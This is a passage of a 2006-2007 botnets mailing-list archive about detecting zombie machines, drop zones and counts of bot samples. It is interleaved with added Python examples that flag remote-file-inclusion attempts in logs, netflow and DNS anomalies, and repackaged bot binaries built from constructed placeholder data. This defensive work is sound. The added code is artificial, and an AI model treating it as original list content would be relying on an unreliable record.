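            found.append(value.rstrip('?'))
    return found


def rfi_report(lines):
    """Aggregate RFI attempts per source IP: {ip: {'hits': n, 'payloads': Counter}}."""
    report = defaultdict(lambda: {"hits": 0, "payloads": Counter()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        payloads = rfi_payloads(rec["target"])
        if not payloads:
            continue
        entry = report[rec["ip"]]
        entry["hits"] += 1
        entry["payloads"].update(payloads)
    return dict(report)


def format_report(report):
    """Render the aggregate in the 'IP | Hit Count | Malware (Count), ...' layout."""
    rows = ["IP | Hit Count | Malware (Count), ..."]
    for ip, entry in sorted(report.items(), key=lambda kv: (-kv[1]["hits"], kv[0])):
        payloads = ", ".join(f"{url} ({n})" for url, n in entry["payloads"].most_common())
        rows.append(f"{ip} | {entry['hits']} | {payloads}")
    return "\n".join(rows)


def repeat_offenders(report, min_hits=3):
    """Sources that keep coming back; candidates for a block at the edge or the WAF."""
    return sorted(ip for ip, entry in report.items() if entry["hits"] >= min_hits)


if __name__ == "__main__":
    rep = rfi_report(SAMPLE_LOG.splitlines())
    print(format_report(rep))
    print("repeat offenders:", repeat_offenders(rep))
```

Aggregating the payload URLs across sources (rather than per IP) is what gives you the hosting farm serving the shells, which is the other party worth a takedown request.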
Re: [botnets] [da] Finding zombies?
On Mon, 8 Jan 2007, Sean Zadig wrote:
> Greetings all,
>
> I'm looking for suggestions on innovative ways to find zombie machines on my networks. Right now, we're looking for IRC traffic and doing some checking for connections to C&C machines (using Shadowserver and various other C&C lists). Do any of you have any recommendations for other methods? So far, I haven't been able to find too much zombie activity, but I have a feeling it's there. We simply have too many machines for there not to be some activity.

Hi Sean. :)

Before you get too complicated and complex, start by checking netflow information, as well as DNS information.

If 15K machines are going to one computer out in the world and it is not CNN, you have a problem. If suddenly most DNS requests are for a not previously seen RR, you have trouble.

> Thanks,
> Sean Zadig
>
> Sean Zadig
> Special Agent
> NASA OIG Computer Crimes Division
> Goddard Space Flight Center
> 301.286.8232
> PGP Key: 0xE9659D75
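The two heuristics in the reply above, many internal hosts converging on one external endpoint and a never-before-seen name suddenly dominating the resolver log, as an added example in Python (not code from the list or from either poster's environment). The flow records, query log, internal ranges and the allowlisted "popular" destination are all constructed placeholders; real input would come from a flow collector and the resolver's query log.

```python
import ipaddress
from collections import Counter, defaultdict

# Address space that is "ours"; everything else is the outside world.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
# External endpoints a large population legitimately converges on
# (the "and it is not CNN" exception); placeholder address.
KNOWN_POPULAR = {"198.51.100.20"}

# Constructed flow records (src, dst, dst_port); placeholder addresses.
SAMPLE_FLOWS = [
    ("10.0.1.1", "203.0.113.9", 6667),
    ("10.0.1.2", "203.0.113.9", 6667),
    ("10.0.2.3", "203.0.113.9", 6667),
    ("10.0.2.4", "203.0.113.9", 6667),
    ("10.0.1.1", "198.51.100.20", 80),
    ("10.0.1.2", "198.51.100.20", 80),
    ("10.0.2.3", "198.51.100.20", 80),
    ("10.0.1.5", "198.51.100.77", 443),
    ("10.0.1.1", "10.0.9.9", 445),        # internal to internal: ignored
    ("203.0.113.50", "10.0.1.1", 22),     # inbound from outside: ignored
]

# Constructed resolver query log (client, qname); names are placeholders.
SAMPLE_QUERIES = (
    [(f"10.0.1.{i}", "cc.placeholder.example.") for i in range(1, 7)]
    + [("10.0.1.1", "www.example.com"), ("10.0.2.3", "WWW.example.com")]
    + [("10.0.1.2", "mail.example.com"), ("10.0.1.9", "new-but-rare.example")]
)
# Names that were already being queried before the window under examination.
BASELINE_NAMES = {"www.example.com", "mail.example.com", "update.example.org"}


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def fan_in_by_destination(flows):
    """Map each external (dst, port) to the set of internal hosts that reached it."""
    fan_in = defaultdict(set)
    for src, dst, dport in flows:
        if is_internal(src) and not is_internal(dst):
            fan_in[(dst, dport)].add(src)
    return fan_in


def suspicious_destinations(flows, min_sources=3, allowlist=frozenset(KNOWN_POPULAR)):
    """External endpoints that at least min_sources internal hosts converge on
    and that are not known-popular services: [(dst, port, n_sources)]."""
    fan_in = fan_in_by_destination(flows)
    hits = [(dst, port, len(srcs)) for (dst, port), srcs in fan_in.items()
            if len(srcs) >= min_sources and dst not in allowlist]
    return sorted(hits, key=lambda h: (-h[2], h[0], h[1]))


def normalize(qname):
    """Case-fold and drop the trailing dot so the same name counts once."""
    return qname.lower().rstrip(".")


def new_dominant_names(queries, baseline, min_share=0.5):
    """Names absent from the baseline that suddenly account for at least
    min_share of all queries in the window: [(name, count)]."""
    counts = Counter(normalize(q) for _, q in queries)
    total = sum(counts.values())
    if total == 0:
        return []
    known = {normalize(n) for n in baseline}
    return [(name, n) for name, n in counts.most_common()
            if name not in known and n / total >= min_share]


if __name__ == "__main__":
    for dst, port, n in suspicious_destinations(SAMPLE_FLOWS):
        print(f"{n} internal hosts -> {dst}:{port}")
    for name, n in new_dominant_names(SAMPLE_QUERIES, BASELINE_NAMES):
        print(f"new name {name} seen in {n} of {len(SAMPLE_QUERIES)} queries")
```

The flow check is per destination endpoint, so a C&C that moves ports but not hosts still shows up once you drop the port from the key; the DNS check needs a baseline taken from a quiet window, not from the same day.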
[botnets] CCC lecture by Georg Wicherski
Georg (who is a very cool guy who I am proud to have shared beer with along with Thorsten and some other guys at the C-BASE party) gave a lecture at CCC on botnet detection and mitigation.

It can be downloaded from here: http://mirror1.kaschwig.net/23C3/botnet-detect-t4s2.wmv

Don't be too evil on the mirror, try a different location from: http://events.ccc.de/congress/2006/Streams

Good going Georg!

Gadi.
[botnets] drop zones and an intelligence war
In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it. Go FX.

I will refrain from commenting on the report he describes from secure works, which I guess is a comment on its own.

We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).

Once with a very large security intelligence company giving drop zone data in a marketing attempt to get more bank clients (hey buddy, why are 400 banks surfing to our drop zone?!?!)

Twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn't until a week later during the same lecture at the first ISOI workshop hosted by Cisco).

For this guy's defense though, he was sharing information. In a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats.

Did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move?

It's enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available.

I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason.

What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries. At least we have responsible folks like FX around to take care of things when others screw up.
I got tired of being the bad guy calling the king is naked, at least in this case we can blame FX. :)

It's an intelligence war people, and it is high time we got our act together. I will raise this subject at the next ISOI workshop hosted by Microsoft ( http://isotf.org/isoi2.html ) and see what bright ideas we come up with.

Gadi.
Re: [botnets] [phishing] drop zones and an intelligence war
On Sat, 23 Dec 2006, Gadi Evron wrote:
> In this post ( http://www.phenoelit.net/lablog/Irresponsible.sl ), FX describes a drop zone for a phishing/banking trojan horse, and how he got to it. Go FX.
>
> I will refrain from commenting on the report he describes from secure works, which I guess is a comment on its own.

Secure Science, typo on my end.

> We had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).
>
> Once with a very large security intelligence company giving drop zone data in a marketing attempt to get more bank clients (hey buddy, why are 400 banks surfing to our drop zone?!?!)
>
> Twice with a guy at defcon showing a live drop zone, and the data analysis for it, asking for it to be taken down (it wasn't until a week later during the same lecture at the first ISOI workshop hosted by Cisco).
>
> For this guy's defense though, he was sharing information. In a time where nearly no one was aware of drop zones even though they have been happening for years, he shared data which was valuable commercially, openly, and allowed others to clue up on the threats.
>
> Did anyone ever consider this is an intelligence source, and take down not being exactly the smartest move?
>
> It's enough that the good guys all fight over the same information, and even the most experienced security professionals make mistakes that cost in millions of USD daily, but publishing drop zone IPs publicly? That can only result in a lost intelligence source and the next one being, say, not so available.
>
> I believe in public information and the harm of over-secrecy, I am however a very strong believer that some things are secrets for a reason.
>
> What can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries. At least we have responsible folks like FX around to take care of things when others screw up.
>
> I got tired of being the bad guy calling the king is naked, at least in this case we can blame FX. :)
>
> It's an intelligence war people, and it is high time we got our act together. I will raise this subject at the next ISOI workshop hosted by Microsoft ( http://isotf.org/isoi2.html ) and see what bright ideas we come up with.
>
> Gadi.
[botnets] [funsec] Botnet Infected User's PC Results In Armed Police Raid (fwd)
Either they have a very interesting case, or they are newbies investigating these frauds for the first time, turning up with warrants at infected people's houses.

-- Forwarded message --
Date: Fri, 8 Dec 2006 05:11:15 GMT
From: Fergie [EMAIL PROTECTED]
To: funsec@linuxbox.org
Subject: [funsec] Botnet Infected User's PC Results In Armed Police Raid

Via ABC 7 News (Denver).

[snip]

A Denver woman who didn't have adequate security on her home computer paid the price. Serry Winkler was visited by several officers with a search warrant who demanded that she turn over her computer. They were investigating a case of computer fraud. The woman's computer was apparently infected by a bot or robot. Investigators said someone hacked into Winkler's computer, stole her IP address and used it with a stolen credit card to make fraudulent purchases online. Police said they were trying to get to the bottom of it.

[snip]

More: http://www.thedenverchannel.com/news/10486347/detail.html

- ferg

--
Fergie, a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawg(at)netzero.net
ferg's tech blog: http://fergdawg.blogspot.com/
[botnets] Agenda and Schedule for January Workshop
The agenda and schedule for the workshop can be found here: http://isotf.org/isoi2.html

Only 9 seats left.

Gadi.
Re: [botnets] Possible DNS DDOS attack
On Thu, 7 Dec 2006, Pagnozzi Sergio wrote:
> > Help me understand:
> >
> > This is an attack on your network, coming from many IPs in the world to a single IP address in your network?
> >
> > This is an attack coming from your network, going from many machines to a single IP address in someone else's network?
>
> Well... I don't know exactly what's up on my network... I can see massive DNS A/ queries to my DNS server both from ITZ and my internal hosts... This happens in determinate periods... From 9 to 12 AM and from 2 to 20 PM. It's 2 days long that we can see that..

Can you upload a packet capture somewhere?
Re: [botnets] 2 Days of Photo Cart Vulnerability Attack
On Thu, 7 Dec 2006, William Atchison wrote:
> Perhaps this might be of interest to a few of you as some of the locations where this attack originates from are definitely compromised servers.
>
> http://incredibill.blogspot.com/2006/12/botnet-attempts-photo-cart.html
> http://incredibill.blogspot.com/2006/12/day-two-of-photo-cart-attack.html

These are remote file inclusion attacks. You have seen some which happen quite a lot, yet get very little attention.

> --
> Bill Atchison
> http://www.crawlwall.com
> (650) 358-9649
Re: [botnets] preliminary agenda for ISOI 2 (DA Workshop, January at Microsoft)
On Sun, 3 Dec 2006, virendra rode // wrote:
> Gadi,
>
> Will minutes and/or presentation made available for folks who won't be attending this workshop? In my case, I will be out of the country.

I hope to be able to do so, it is not clear at this point.

Gadi.

> regards,
> /virendra
>
> Gadi Evron wrote:
> > -- Forwarded message --
> > Date: Sat, 2 Dec 2006 10:27:55 -0600 (CST)
> > From: Gadi Evron [EMAIL PROTECTED]
> > Subject: preliminary agenda for ISOI 2 (DA Workshop, January at Microsoft)
> >
> > Hi again guys.
> >
> > The following is a preliminary and incomplete list of speakers for the DA workshop (ISOI 2). I hope to have something more complete, with schedule, soon.
> >
> > January 25-26, Redmond (Hosted by Microsoft with after-party dinner by Trend Micro).
> >
> > Please remember to RSVP!
> >
> > Speakers
> >
> > Righard Zwienenberg (Norman)
> >  - SandBox solutions are NOT the ultimate solutions and can be beaten... (sandboxes countermeasures, case study from Norman)
> >  - Panel: From Botnet to Shutdown and Prosecution: What to do?
> >
> > Hubbard, Dan (Websense)
> >  - Web War Games (what we don't know *will* hurt us/malware profiteering/automated tools - webattacker)
> >
> > Alex Shipp (Message Labs)
> >  - Intelligence update: targeted trojan attacks
> >
> > Andrew Fried (IRS)
> >  - Problems and solutions when investigating phishing cases
> >
> > Greg Galford (Microsoft MSRC)
> >  - MSRC handling of 0day attacks
> >
> > Paul "Fergie" Ferguson (Trend Micro)
> >  - Innovations in using DNS as an early warning system for attacks/botnets
> >  - Discussion: Creating an updated BCP 38 at the IETF
> >
> > Ziv Mador (Microsoft antimalware)
> >  - Zero-day exploits in 2006 - the Microsoft antimalware team's perspective
> >
> > Gadi Evron (Beyond Security, ISOTF)
> >  - Planning an intelligence war
> >  - Web servers as botnets and hosting farms as attack platforms
> >
> > Barry Greene (Cisco)
> >  - Netflow revisited
> >  - Discussion: TBA
> >
> > Randy Vaughn
> >  - Contacting the world: building and perfecting an AS-based reporting system
> >
> > Chris Wee (+ Oliver Friedrichs, Symantec)
> >  - Trolling the BotNet Economy
> >
> > Jose Nazario (Arbor)
> >  - DDoS and Botnets: Same as it ever was (statistics and trends)
> >
> > Douglas Otis
> >  - Abusing SPF for a DDoS amplification attack DDoS on DNS
> >
> > Christoph Fischer
> >  - TBD: Intelligence update: MiTM and banking trojan horses
> >
> > Joe Hartmann (Trend Micro)
> >  - TBD
> >
> > Tom Grasso (FBI)
> >  - TBD
> >
> > Danny McPherson
> >  - TBA
> >
> > Mike Reavey (Microsoft MSRC)
> >  - Discussion: TBA
> >
> > Rob Slade
> >  - TBA
> >
> > Jim Deleskie (VSNL)
> >  - TBA
> >
> > More speakers TBA.
[botnets] Re-branding IPS as an anti botnet tool
I have seen a PR last month from Mcafee on this issue, and now they issued another one.

For most cases, I don't believe in IDS products. I think that trying to pitch I[DP]S as a solution for botnets is technologically silly, but marketing-wise right on the spot. As THE solution it is plain and simple silly.

A lot of security vendors will now start taking that approach, dealing with the buzzword.

An IPS will not cure your botnet problems. It may help pinpoint some bots (or similar) on your network, which is important, but that's about it.

I wish Mcafee all the luck in the world, but this is, in my opinion, way way way over-hyped: http://www.mcafee.com/us/local_content/white_papers/wp_botnet.pdf

In another PR they present a case study on how they saved a south American country from a botnet attack using their IPS. I would like to see more.. or something, to back it up as to how, before I state my opinion.

What do you think?

Gadi.
[botnets] [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far) (fwd)
So, here we go. Real-life uses for vulnerabilities.

Below is an example of just ONE drop-zone server in the United States, which has 600 financial companies and banks. Several gigs of data.

How do these things work? They get installed by the use of a web vulnerability, an email attachment or network scanning, utilizing several vulnerabilities. One drop zone, and all this noise gets made.

I am very happy to hear that the UK police (which are good people) are doing something about this, however, banks, eCommerce sites, dating sites, etc. all get attacked by these things, by the users being infected.

These trojan horses use rootkit technology, with a hook, using man in the middle attacks to bypass the SSL encryption, and steal any HTTPS credentials they come across.

These things are so wide-spread, this news item made me raise my eye-brow, at first.

So, knowing full-well security is out of our hands, and relies on the security of our users. Knowing full-well that the same technology can be used to bypass 2-factor authentication, how do organizations handle their own security, if they are to have clients?

The point is, though, that this is a well planned operation, with new samples being released with new vulnerabilities to exploit, constantly. This should not be considered a one time case or a lost laptop containing private data. This is what vulnerabilities are about - the damage and operations they are used for.

Gadi.

-- Forwarded message --
Date: Tue, 24 Oct 2006 21:24:20 GMT
From: Fergie [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far)

Via InfoWorld.

[snip]

British electronic-crime detectives are investigating a massive data theft operation that stole sensitive information from 8,500 people in the U.K. and others in some 60 countries, officials said Tuesday.
In total, cybercriminals targeted 600 financial companies and banks, according to U.K. authorities, who have worked over the past week to identify and notify victims.

Through intelligence sources, U.K. police were given several gigabytes of data -- around 130,00 files -- that came from a server in the U.S., said Charlie McMurdie, detective chief inspector for the Specialist Crime Directorate e-Crime Unit of the London Metropolitan Police. Most of the data related to financial information, she said.

The data was collected by a malicious software program nicknamed Haxdoor that infected victims' computers. Some 2,300 machines were located in the U.K. McMurdie said.

[snip]

More: http://www.infoworld.com/article/06/10/24/HNukdatatheft_1.html

- ferg

--
Fergie, a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawg(at)netzero.net
ferg's tech blog: http://fergdawg.blogspot.com/
[botnets] [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard (fwd)
-- Forwarded Message --
Subject: [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard
Date: Thursday 19 October 2006 11:13
From: Victor Grishchenko [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk

Hi!

While building and testing a customized version of DevilLinux router distro I found an IRC bot onboard. As far as I understood, it was EnergyMech compiled from source right there plus some executable named TODO (for camouflage purposes). The stuff unfolds at /shm/sshd/ and runs somehow. Sadly, I had no time for detailed investigation. It leaves an overall impression of script kiddie's work.

Last days DevilLinux website seems to be dead.

Victor Grishchenko
Digital Channels Network
Yekaterinburg, Russia
Re: [botnets] Spammed - sorry
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Fri, 22 Sep 2006 [EMAIL PROTECTED] wrote: In light of recent litigation, I might be inclined to recommend that folks ban all emails from spamhaus.org or from anybody that appears to be sending from spamhaus.org. From the mail headers: mail.amigostecnicos.net (amigostecnicos.net [209.151.108.130]) I almost didn't approve your email message. Then decided I hate censorship. Now, I allowed it through, but that does not mean I will let your lack of understanding and complete spread of libel spoo and spew against spamhaud stand Don't spread lies and don't attack people liek spamhaus before you go and do on your own. And you dare attack Richard of all people? For those interested in what really happened, check spamhaus's site for news on the spammer suing them with, in my opinion, no shame. Keith, if that is your real name, you may be an inncoent bystander who fell for spammer lies, but you spread them further attacking others which has no real excuse. Gadi. -Original Message- From: Richard Cox [mailto:[EMAIL PROTECTED] Sent: Friday, September 22, 2006 6:39 PM To: botnets@whitestar.linuxbox.org Subject: Re: [botnets] Spammed - sorry To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Fri, 22 Sep 2006 09:07:05 -0500 RL Vaughn [EMAIL PROTECTED] wrote: Looks like some filter slipped. I will see if we can tighten up the filters. Like ... reject all mail sent in the future ? -- Richard Cox [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. 
Re: [botnets] AIM botnet in the news
On Wed, 20 Sep 2006, Black Ratchet wrote:

On Tue, 19 Sep 2006 5:27am, Gadi Evron wrote: The good thing about IM botnets is that they run on controlled services, and that the people running them can stop them, if they so choose.

The impression I got was while the point of attack was over AIM, the botnet itself was IRC based.

Yes, the infected systems are likely still there but the infection/propagation is stopped. While AIM runs on a controlled system.

I doubt AOL has the time, money, or inclination to deal with it. Else they would have likely stopped a lot of the other AIM worms that have been floating around for a year(?) or so.

Who said they don't?

Plus, it's not like it's difficult to make gobs of new AIM accounts. (Do they use some kind of CAPTCHA system? It's been ages since I signed up for one.)

Setting up new accounts to attack others is non-trivial.

I don't know.. you are right.

~BR
[botnets] [phishing] identities lost in phishing (fwd)
Hi guys. I would like to invite you to come to the phishing list and participate in this discussion. To subscribe: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing

Gadi.

-- Forwarded message --
Date: Mon, 18 Sep 2006 06:37:39 -0500 (CDT)
From: Gadi Evron [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [phishing] identities lost in phishing

As I often comment, it is funny to me (not really but hold on) when people scream about this or that organization losing a laptop with 20K identities. What's 20K? Obviously that is important, and speaks volumes of corporate security and of privacy issues. Still, it is insignificant in a laughable fashion when compared to what's being stolen daily online.

Every day, millions of online identities and website credentials are lost. Millions. Every day. This is done through trojan horses which are spread (bots, worm fashion) among an immense online population. There are thousands of new variants to these bots coming out every month dedicated specifically as a targeted attack on online financial institutions. These attacks target the financial online sites (banking, eCommerce, etc.) not by attacking them directly on the macro level, but rather by multiple micro-level attacks against their users, en masse.

These trojan horses (bots) are so advanced, they utilize rootkit technology, and when the user surfs to an HTTPS site, use man-in-the-middle attacks on the machine itself to steal his or her credentials. These credentials in turn are sent to the remote attackers for further processing. A lot of money is lost this way.

This is a world-wide problem, but it is especially apparent (as the bad guys utilize the data more and more) in, but not limited to, the UK and Europe. In the US this is a growing trend, but it is mostly ignored by the defenders (most are not aware of it) as regular primitive email phishing is still the most apparent threat there. This is largely due to US banks still mostly using username and password authentication. Email phishing is important and a large threat, but it is doomed to death (it will still be here 10 years from now, like Nigerian scams are here today, but as a specific threat it will diminish into obscurity). Phishing today should become the root in a tree called Online Financial Fraud or eFraud. That, friends, is not going away whether in blogs, trojan horses, email or your cell phone.

These trojan horse attacks, as they are located on the user's machine itself, are not stopped by 2-factor authentication, etc. There are things that can be done, but when the security problem is on a remote machine not under the, say, bank's control, there is not much they can do with their current confidence risk assessment systems. There are solutions, but these are to be discussed another time.

It is obvious that one of the biggest problems facing banks, and ESPECIALLY eCommerce sites (without the physical-space presence) is how to establish reputation systems that will provide a technological risk assessment confidence decision as to how safe it is to work with a remote user. The web channel is the cheapest and most effective in banking today, and banks will not want to lose it.

We (Alan Solomon and myself) cover some of the market involving this technology and how it works in a recent paper we published in the Virus Bulletin September edition: http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf

Others here with experience on this, who are willing to talk, please share your experience with us.

Gadi.

phishing mailing list [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
[botnets] go FTC
http://news.zdnet.com/2100-1009_22-6115948.html

Gadi.
[botnets] Paper: Analyzing Large DDoS Attacks Using Multiple Data Sources
This paper was brought to my attention now three times, so I figured I might as well email it here. An interesting read: http://www.research.att.com/~kobus/docs/ddos.lsad.pdf

Gadi.
[botnets] phishing mailing list
The [EMAIL PROTECTED] mailing list is now going live, months too late, but hey, let's get started on phishing issues over there.

Gadi.
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Botnet Hunter wrote:
> On 9/14/06, Gadi Evron [EMAIL PROTECTED] wrote:
> > AVG is 15K, I can prove *on my own* 12K... counting banking/phishing trojan horses, general purpose trojans, dialers, etc (from the large bot families).
>
> So... by both your and Jose's definitions Banker.Delf is a bot? A dialer is a bot? A downloader is a bot? An Explorer Hijack is a bot?

I treat the banker family (and similar) as bots. Absolutely.

> A phishing email is a bot?

If the email has a certain attachment with it, that I will call a banker trojan, then yes. If it spreads as such (or more importantly, through such) and reports to a centralized location, then yes, it is a bot. A bot is a trojan horse, often with spreading capabilities and a centralized reporting/control mechanism.

> I'm sorry, but while I believe botnets (particularly those controlled via HTTP(S) which follow protocol standards) are a serious problem - your numbers don't ring true to the fairly large set of samples I see under my definition of a bot. They don't seem to be ringing true with

What is your definition of a bot?

> some of other people either. In fact, to me, they sound a lot like hype.

The numbers I mentioned are about the known bot families, such as agobot, rbot, etc. The fact I call a banker a bot is unrelated to these numbers but should add about a thousand. Not much more. If you include other phishing trojans with central control/reporting mechanisms that I do count, quite a bit more. What do you think bots are used for? Multi-purpose bots are not the only trojan horse I will refer to as a bot. That said, I will not treat a self-replicating virus as a bot. :) I understand the confusion, but there is nothing to be confused about. These numbers are accepted and known. Your disbelief is out of your lack of willingness to accept such numbers, as you stated.

> 2,000-3,000 a month of true connection oriented and non-connection oriented bots (IRC vs. HTTP custom protocol) which are capable of

Connection oriented?

> receiving and acting on multiple commands are what I'm seeing. This

Ahh, multi-purpose bots.

> would include the classic bot/zombie, the http and custom protocol bot/zombie and some RATs.

Hmm, p2p? Gossip-algorithms based? WEB services based? No connection at all but rather act as a dropper? The dropped result? Specific-purpose trojans? Phishing trojans? (bots)

> So saying you have a 12 penis may in fact be true and yes... it might even make me feel a little insecure about my smaller manhood. But not if you're talking about a piece of plastic.

I suggest you see a doctor about that, they have operations to help with insecurity these days. But seriously, these numbers are what they are, I wish they were invented, but they are not. Please, let me elaborate further on whatever you like. Please grill me here and now about them. Ask me the questions you want to ask.
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
On Fri, 15 Sep 2006, Jörg Weber wrote:

I can second that, from a not-associated-with-anyone-POV. I get many, many slightly mutated versions of the same bot every day, on average one new version a day, on a very small honeynet. More often than not, AV fails to detect these mods. I obviously don't reach 15k/month, but in this case size does matter. Seen that these mutations could be simply mailed around, too, and AV wouldn't detect them either, makes counting them as unique, new, bots a valid POV, methinks.

Indeed. You should note though that the bad guys have the advantage of being able to test their creations against the anti viruses before release.. which is kind of an issue.

The AV is not any type of perfect solution for a long time now. It plays a critical part in the fight, but it is far behind being just reactive.

Indeed.

Cheers, Joerg

-- Joerg Weber M. A.
Teamleiter Netzwerk-Sicherheit/Netzwerk-Applikationen
infoServe GmbH, Nell-Breuning-Allee 6, D-66115 Saarbruecken
T: (0681) 8 80 08 - 59  F: (0681) 8 80 08 - 33
www.infos.de  mailto: [EMAIL PROTECTED]

it sounds like we're on the same page, but you may feel it's hyping the problem to talk about new bots based on unique MD5 values. it's not my favorite way of thinking about it, but it is easily underscored by a real-world fact: many AV vendors fail to detect the same bot source simply repackaged or re-configured (ie a new IRC server, everything else the same). hence, each new MD5 means a new detection hit for them. so, hype has a real-world backing, namely AV detection issues.
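The point made just above, that one bot repackaged with a new IRC server yields a new MD5 and so a new "sample", is easy to show in code. The following is an added example, not code from the list or from any AV vendor: two constructed byte strings stand in for two builds of the same bot that differ only in their embedded C&C settings. The NUL-terminated KEY=VALUE config layout, the key names SERVER and CHAN, and the helper names are assumptions made for the illustration; a real sample would need its own config locator.

```python
"""Why counting bots by unique MD5 overcounts: an added example, not from
the list thread. BOT_A and BOT_B are constructed byte strings (not real
malware) that share all code and differ only in the embedded C&C config.
"""
import hashlib
import re

# Constructed "bot binaries": identical code, different IRC C&C settings.
CODE = b"\x7fELF..bot-code..\x00" * 8
BOT_A = CODE + b"SERVER=irc.example-a.net:6667\x00CHAN=#drones\x00" + CODE
BOT_B = CODE + b"SERVER=irc.example-b.org:6669\x00CHAN=#zombies\x00" + CODE

# Assumed (hypothetical) config layout: NUL-terminated KEY=VALUE strings.
CONFIG_RE = re.compile(rb"(SERVER|CHAN)=[^\x00]*\x00")


def md5(data: bytes) -> str:
    """The identity most AV statistics count by."""
    return hashlib.md5(data).hexdigest()


def config_stripped_hash(data: bytes) -> str:
    """Hash of the sample with its C&C configuration blanked out, so two
    repacks of the same bot code that differ only in C&C collapse to one."""
    normalized = CONFIG_RE.sub(lambda m: m.group(1) + b"=\x00", data)
    return hashlib.sha256(normalized).hexdigest()


def extract_config(data: bytes) -> dict:
    """Pull out the C&C settings, i.e. what actually changed between builds."""
    out = {}
    for m in CONFIG_RE.finditer(data):
        key, _, value = m.group(0).rstrip(b"\x00").partition(b"=")
        out[key.decode()] = value.decode()
    return out


def count_unique(samples, keyfunc) -> int:
    """Number of distinct samples under a given notion of identity."""
    return len({keyfunc(s) for s in samples})


if __name__ == "__main__":
    samples = [BOT_A, BOT_B, BOT_A]
    print("unique by md5:  ", count_unique(samples, md5))
    print("unique by code: ", count_unique(samples, config_stripped_hash))
    for s in (BOT_A, BOT_B):
        print(md5(s), extract_config(s))
```

Counted by MD5 the three samples are two "new bots"; counted by code with the config masked they are one family with two C&C servers, which is the distinction the thread is arguing about.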
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dude VanWinkle wrote:
On 9/14/06, Gadi Evron [EMAIL PROTECTED] wrote:

This counts bot samples. Whether they are variants (changed) or insignificant changes such as only the IP address to the C&C, they are counted as unique.

So if you have multiple machines NAT'ed under one IP, that is one pot. err bot eh?

OK. And if I see 10 bots using the same address on a dynamic range.. ever heard of DHCP? The number crunching schemes are never perfect but they are pretty good. I count, much like many others, unique IPs. A bot is defined as an instance of an installed Trojan horse. One machine may have (and probably does have) several. We can count IPs and we do.

3.5 Million hosts, note, for spam alone. The total population count is mind-boggling.

I believe spamhaus has it pinned at 3.2 millions, other have higher numbers.

That's about where it is for EMAIL based spam, per day.

This is why we now run different sharing projects between established honey nets.

So you dont count botnets that detect honeynets eh?

Honey pot detection is an interesting field, I am familiar with it and even consider myself somewhat of a knowledgeable person on it, but there are those who research it actively. As interesting as it may be, it's not much of a field yet, sorry to say. Honey pots of different kinds work marvelously. Not all our sources for samples are the same. It would be silly of me to divulge them all (especially as personally I have no use for samples these days and others do). Still, we can only report what we see, what do you see?

or other trivial changes? Do you attempt to correct for complex polymorphic variants?

Nah, just contributors who dont all have publicly routable IP's and this herders that know about VMware/Honeywall

There aren't many of those.. really. :)

Really? Ok.

Further, the anti virus world sees about the same numbers.

Using the same methods?

And their reporting user-base, alliances and sharing partners, and what not. Yes.

Do you think all bots are extremely smart rootkits? I am quite happy to say most botnets are nothing if not the re-use of old code, which is freely available, using the same old methods. There are other types of malware out there.

The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K avg bot samples a month, as well.

Gotcha, you MS and Symantec share numbers based of who doesnt know how to disable your detection methods

You assume too much Dude. Still, you are right, 100%. I can only detect what I know how to detect. But samples are not the only way to follow botnets, and there are many ends on how to approach one problems. Cryptic? I suppose, but hey, Google for methods, see what you find, and tell me what you think. I believe we have pretty good coverage, but I also need to admit most anti viruses do not cover bot detection very well.

I am just saying, the larger the organization, the sharper the focus from the other side. Maybe a loose coalition of known non-bullshitters would have a more accurate picture.

The picture you got is pretty accurate. Don't take my word for it though. I am happy to examine and share (as much as I can, which is more than enough to show the numbers (lower numbers) we chose to show in the article. What numbers do you need? What makes you doubt what we have given? I'd be more than happy to answer any question you have or counter-numbers you have, but your love for me is as irrelevant as you calling me a *** when you don't show your own data or challenge mine with actual questions like Dave (the other dave) did.

Thanks, Gadi.

still love ja tho Gadi, -JP the douchebg

Got a link/quote/reference to that? Does Ziv explain the methodology that they are using?

